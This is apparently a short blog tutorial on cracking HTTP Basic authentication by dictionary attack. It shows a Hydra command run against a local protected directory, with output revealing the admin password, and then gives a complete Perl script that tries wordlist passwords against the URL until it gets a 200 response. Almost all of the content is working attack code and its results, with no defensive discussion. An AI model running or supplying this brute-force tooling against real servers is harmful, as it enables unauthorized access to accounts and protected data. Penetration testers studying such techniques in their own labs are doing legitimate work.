Basic HTTP Authentication Dictionary Attack
Sometimes you come across basic http authentication which needs to be cracked in order to gain access to the protected contents of the server. We can use two ways to acomplish the task, one is using Hydra to brute force the login and the second is we can write our own script in PERL.
root@ubuntu:~/public_html# hydra -l admin -P wordlist.txt localhost http-get /~sam/protected Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (http://www.thc.org/thc-hydra) starting at 2019-08-17 12:26:44 [DATA] max 16 tasks per 1 server, overall 16 tasks, 109 login tries (l:1/p:109), ~7 tries per task [DATA] attacking http-get://localhost:80//~sam/protected [80][http-get] host: localhost login: admin password: manager 1 of 1 target successfully completed, 1 valid password found Hydra (http://www.thc.org/thc-hydra) finished at 2019-08-17 12:26:46 root@ubuntu:~/public_html#
We can write our own script in perl to apply a dictonary attack on basic HTTP authentication.
#!/usr/bin/env perl
#
# basic http auth brute force
#
use strict;
use warnings;
use LWP::UserAgent;
use URI;
## Target URL
my $target = URI->new("http://localhost/~sam/protected/");
my $host = $target->host.":".$target->port;
## Realm to use
my $realm = "Protected Content";
## User to brute force
my $user = "admin";
## Passwords list
my $wordlist = "wordlist.txt";
open(my $fh, '<', $wordlist) or die $!;
my $user_agent = LWP::UserAgent->new();
while (my $pass = <$fh>) {
chomp($pass);
$user_agent->credentials($host, $realm, $user, $pass);
my $res = $user_agent->get($target);
print "200 OK -> $user:$pass\n" if ($res->is_success);
}
If we run the script we get the username and password based on a HTTP 200 OK repsonse code.
sam@ubuntu:~/public_html$ perl basic-http-auth.pl 200 OK -> admin:manager sam@ubuntu:~/public_html$
No comments:
Post a Comment